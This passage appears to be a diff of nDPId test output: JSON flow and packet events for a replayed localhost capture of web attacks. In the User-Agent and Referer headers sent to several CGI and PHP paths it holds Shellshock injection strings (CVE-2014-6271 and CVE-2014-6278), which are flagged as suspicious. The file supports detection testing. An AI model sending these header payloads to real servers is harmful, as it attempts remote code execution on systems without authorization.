+01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":1,"flow_last_seen":1576420277423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277423,"pkt":"AAAAAAAAAAAAAAAACABFAAENVqhAAEAG5UB\/AAABfwAAAcU+H5CeOW5utt+cAoAYAED\/AQAAAQEICp1m\/dedZv3XR0VUIC9sb2FkcGFnZS5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/loadpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/loadpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":1,"flow_last_seen":1576420277425,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277425,"pkt":"AAAAAAAAAAAAAAAACABFAAEKJkVAAEAGFad\/AAABfwAAAcVAH5DPeB6QOQhEGoAYAED+\/gAAAQEICp1m\/didZv3YR0VUIC9sb2dpbi5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1576420277426,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277426,"pkt":"AAAAAAAAAAAAAAAACABFAAEKG0lAAEAGIKN\/AAABfwAAAcVCH5Dr2SOM+8VpkIAYAED+\/gAAAQEICp1m\/dqdZv3aR0VUIC9sb2dpbi5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1576420277428,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277428,"pkt":"AAAAAAAAAAAAAAAACABFAAEJsHVAAEAGi3d\/AAABfwAAAcVEH5DgV4i\/xF\/y64AYAED+\/QAAAQEICp1m\/dydZv3cR0VUIC9sb2dpbi5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":1,"flow_last_seen":1576420277429,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277429,"pkt":"AAAAAAAAAAAAAAAACABFAAEMTIBAAEAG72l\/AAABfwAAAcVGH5AiwXS0u+SpZoAYAED\/AAAAAQEICp1m\/d2dZv3dR0VUIC9wYXRodGVzdC5wbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pathtest.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pathtest.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7580000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":1,"flow_last_seen":1576420277431,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1576420277431,"pkt":"AAAAAAAAAAAAAAAACABFAAEE5XFAAEAGVoB\/AAABfwAAAcVIH5CqQt2jzObFZYAYAED++AAAAQEICp1m\/d+dZv3eR0VUIC9waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7580000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7580000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":1,"flow_last_seen":1576420277432,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277432,"pkt":"AAAAAAAAAAAAAAAACABFAAEFeJtAAEAGw1V\/AAABfwAAAcVKH5AUwUBY1pIiyIAYAED++QAAAQEICp1m\/eCdZv3gR0VUIC9waHA0IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php4","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
